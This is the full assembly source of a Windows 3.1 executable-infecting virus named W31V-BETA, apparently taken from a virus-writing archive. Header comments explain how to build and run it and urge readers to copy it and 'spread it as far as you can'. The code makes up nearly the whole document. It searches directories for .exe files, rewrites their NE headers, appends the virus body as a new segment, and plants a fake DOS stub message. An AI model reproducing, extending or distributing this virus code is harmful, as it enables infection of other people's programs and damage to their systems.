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Assembly Source File
331 lines
;Virus Name: W31V-BETA
;Type : Windows Virus, infects windows executables
;Written by: Stalker X
;Here it is folks my first windows virus.
;I would firstly just want to say thankyou to qark and quantum for this
;virus is based on the infection of a windows virus as discribed in VLAD-#4
;Ok as you can see parts of this virus is based on WinSurfer, BUT as you
;can also see it's more compact. Instead of using dropper code I used a
;software fuse. This virus also does not go TSR in windows, it infects on
;execute. The reason why I did not make it TSR is because it's to mutch work
;for me :) and secondly well at the rate Windows users restart programs there
;is no need to go TSR!
;This is my first try so bare with me :) ooooh yes all that comments is
;not ment for you the reader ... BUT ME!! :) Frankly I get lost in my own
;code if I don't comment it.
;Ok Assemble this virus as a EXE then run it in the dir of a Win EXE
;This virus only infects one file at a time but it does change dir's to
;find a file. Nothing new exept that it's for windows .. if you don't
;understand what I have written ,,,, then get VLAD-#4
;Please do copy this code .. add your own stuff if you want to .. I didn't
;write this so it can sit on a shelf. SO GO WILD.. just don't say you wrote
;the whole thing yourself.... just spread it as far as you can and in
;many diffrent copies as you can.
.model tiny
.stack 512
assume cs:@code,ds:@code
org 0
START: pusha ;save all general regs
push si ;save si
push di ;save di
push ds ;save ds
push es ;save es
FUSE: jmp Fused ;first time no DPMI
jmp DPMIdetect ;goto dpmi code
Fused: mov ax,cs ;ax=cs
mov ds,ax ;ds=ax
mov word ptr cs:[FUSE],9090h;blow fuse after 1st run
jmp DPMIFin ;skip dpmi code
DPMIdetect: mov ax,1686h ;check for dpmi
int 2fh ;do check
or ax,ax ;check return
jz DPMIfound ;if 0 then dpmi
jmp EXIT ;exit if no dpmi
DPMIfound: mov ax,000ah ;get alias selector
push cs ;save cs
pop bx ;restore cs in bx
int 31h ;do get alias
push ax ;save ax
pop ds ;restore ax ds
DPMIFin: mov ah,1ah ;set DTA
mov dx,offset DTA ;set DTA ofs
int 21h ;do set DTA
FindFirst: xor cx,cx ;set f attrib
mov ah,4eh ;find first file
mov dx,offset FSPEC ;set fspec
int 21h ;do find it
jc EXIT ;exit if no exe found
Check: call Chk4WinEXE ;check if it's a win exe
cmp [TMP],0 ;check return byte
jz FindNext ;go to next exe if not win
call Infect ;infect the win EXE
mov ah,3eh ;close the exe file
int 21h ;do it
jmp EXIT ;exit to infect only 1 file
FindNext: mov ah,4fh ;find next file
int 21h ;do find it
jnc Check ;go check again for win
ChangeDIR: mov dx,offset DOTDOT ;'..'
mov ah,3bh ;change dir
int 21h ;do change now
jnc FindFirst ;find first file in dir
EXIT: pop es ;restore es
pop ds ;restore ds
pop di ;restore di
pop si ;restore si
popa ;restore all general regs
db 0eah ;far Jmp
ret_ip: dw 0 ;exit program
ret_set dw 0ffffh ;-
Chk4WinEXE: mov dx,offset F_Name ;set file name ofs
mov ax,3d02h ;open file for r/w
int 21h ;do open file
jc ChkExit ;exit on error
mov bx,ax ;save handle in bx
mov si,offset BUFF ;si=offset of buffer
mov ah,3fh ;read function
mov dx,offset BUFF ;dx=offset of buffer
mov cx,512 ;read 512 bytes
int 21h ;do read bytes
cmp byte ptr [si+18h],40h ;check relocation
jb ChkFinF ;exit if not ok
cmp word ptr [si+3ch],400h ;check NE offset
jne ChkFinF ;exit if not ok
cmp word ptr [si+16h],0 ;CS must be 0
jne ChkFinF ;exit if not ok
cmp word ptr [si+14h],0 ;IP must be 0
jne ChkFinF ;exit if not ok
cmp word ptr [si+08h],20h ;check header size
je ChkFin ;exit if not ok
ChkFinF: mov ah,3eh ;close file
int 21h ;do close file
mov [TMP],0 ;return error
retn ;retn
ChkFin: mov [TMP],1 ;return ok
ChkExit: retn ;do it
Infect: mov si,offset BUFF ;si=offset buffer
sub word ptr [si+10h],8 ;move SP back 8 bytes
sub word ptr [si+3ch],8 ;move NE back 8 bytes
mov ax,4200h ;move r/w pointer
xor cx,cx ;cx=0
xor dx,dx ;dx=0
int 21h ;do move r/w pointer
mov ah,40h ;write to file
mov dx,offset BUFF ;set source offset
mov cx,3eh ;write EXE header back
int 21h ;do write header back
mov ax,4200h ;move r/w pointer
xor cx,cx ;cx=0
mov dx,200h ;set to dest
int 21h ;do move r/w pointer
mov ah,40h ;write to file
mov dx,offset winstart ;dx=source offset
mov cx,offset windowsmsgend-offset winstart
int 21h ;write new dos stub
mov ax,4200h ;move r/w pointer
xor cx,cx ;cx=0
mov dx,400h ;set offset
int 21h ;do move r/w pointer
mov ah,3fh ;read from file
mov dx,offset BUFF ;dx=offset of buffer
mov cx,512 ;read header
int 21h ;do read from file
inc word ptr [si+1ch] ;inc segment count
mov ax,word ptr [si+1ch] ;ax=segment count
dec ax ;ax=ax-1
mov cl,8 ;Assume Segs<255
mul cl ;multiply to get bytes
xor dx,dx ;dx=0
add ax,word ptr [si+22h] ;ax=total tab size
adc dx,0 ;add with carry(just incase)
mov cx,512 ;dx:ax/512
div cx ;do it
mov [Move512],ax ;Number of 512pages to mov
mov [MoveLft],dx ;Number of leftover bytes
push word ptr [si+32h] ;save file alignment value
pop [Al_Sh] ;save alignment shift value
mov [Seek],400h ;setup seek var
push word ptr [si+16h] ;save host cs
pop [hostcs] ;save NE cs
push word ptr [si+14h] ;save host ip
pop [hostip] ;save NE ip
mov ax,word ptr [si+1ch] ;ax=number of segments
mov word ptr [si+08h],0 ;clr crc
mov word ptr [si+0ah],0 ;clr crc
mov word ptr [si+14h],0 ;set new ip
mov word ptr [si+16h],ax ;set new cs
mov ax,word ptr [si+22h] ;
cmp word ptr [si+04h],ax ;
jb CmpRes ;
add word ptr [si+04h],8 ;
CmpRes: cmp word ptr [si+24h],ax ;
jb CmpResi ;
add word ptr [si+24h],8 ;
CmpResi: cmp word ptr [si+26h],ax ;
jb CmpModule ;
add word ptr [si+26h],8 ;
CmpModule: cmp word ptr [si+28h],ax ;
jb CmpImp ;
add word ptr [si+28h],8 ;
CmpImp: cmp word ptr [si+2ah],ax ;
jb MoveHead ;
add word ptr [si+2ah],8 ;
MoveHead: mov ax,[Move512] ;loop to move NE head
or ax,ax ;check if counter=0
jz Last ;exit if counter=0
dec [Move512] ;counter=counter-1
mov ax,4200h ;move r/w pointer
xor cx,cx ;cx=0
mov dx,[Seek] ;dx=seek
sub dx,8 ;dx=dx-8
int 21h ;do move r/w pointer
mov ah,40h ;write to file
mov dx,offset BUFF ;dx=source offset
mov cx,512 ;write 512 bytes
int 21h ;do write 512 bytes
add [Seek],512 ;seek=seek+512
mov ax,4200h ;move r/w pointer
xor cx,cx ;cx=0
mov dx,[Seek] ;dx=seek
int 21h ;do move r/w pointer
mov ah,3fh ;read file
mov dx,offset BUFF ;dx=offset buffer
mov cx,512 ;read 512 bytes
int 21h ;do read 512 bytes
jmp MoveHead ;continue to move header
Last: mov ax,4202h ;seek end of file
xor cx,cx ;cx=0
xor dx,dx ;dx=0
int 21h ;do seek
mov cl,byte ptr [Al_Sh] ;cl=shift count
push bx ;save bx
mov bx,1 ;bx=1
shl bx,cl ;calc shift
mov cx,bx ;cx=bx
pop bx ;restore bx
div cx ;divide with shift
mov di,offset BUFF ;di=buffer offset
add di,[MoveLft] ;calc where to patch
mov word ptr [di],ax ;patch insert segment tab
mov word ptr [di+2],offset ALL_VIR
mov word ptr [di+4],180h
mov word ptr [di+6],offset ALL_VIR
mov ax,4200h ;move r/w pointer
xor cx,cx ;cx=0
mov dx,[Seek] ;dx=seek
sub dx,8 ;dx=dx-8
int 21h ;do move r/w pointer
mov ah,40h ;write to file
mov dx,offset BUFF ;dx=source offset
mov cx,[MoveLft] ;write bytes left
add cx,8 ;cx=cx+8 (+segment entry)
int 21h ;do write to file
mov ax,4202h ;seek end of file
xor cx,cx ;cx=0
xor dx,dx ;dx=0
int 21h ;do seek
mov ax,word ptr ds:[ret_ip] ;save link
mov word ptr [si],ax ;save link
mov ax,[ret_set] ;save link
mov word ptr [si+2],ax ;save link
mov word ptr ds:[ret_ip],0 ;setup relocation
mov [ret_set],0FFFFh ;!
mov [relocation],1 ;!
mov [reloc2],3 ;!
mov [reloc3],4 ;!
mov [reloc4],offset ret_ip ;!
mov ah,40h ;write to file
xor dx,dx ;dx=0
mov cx,offset ALL_CODE ;write the hole body
int 21h ;do write
mov ax,word ptr [si] ;restore link
mov word ptr ds:[ret_ip],ax ;restore link
mov ax,word ptr [si+2] ;restore link
mov [ret_set],ax ;restore link
retn ;return from infection
;-Fake win msg
winstart: call windowsmsg
db 'This program requires Microsoft '
db 'Windows.',0dh,0ah,'$'
windowsmsg: pop dx
push cs
pop ds
mov ah,9
int 21h
mov ax,4c01h
int 21h
TMP dw 0
Move512 dw 0
MoveLft dw 0
Al_Sh dw 0
Seek dw 0
DOTDOT db '..',0
FSPEC db '*.exe',0
DTA db 21 dup(0)
Attrib db 0
F_Time dw 0
F_Date dw 0
F_SizeL dw 0
F_SizeH dw 0
F_Name db 13 dup(0)
IDB db 'w31v-BETA'
BUFF db 512 dup(0)
relocation dw 1
reloc2 db 3
reloc3 db 4
reloc4 dw offset ret_ip
hostcs dw 0
hostip dw 0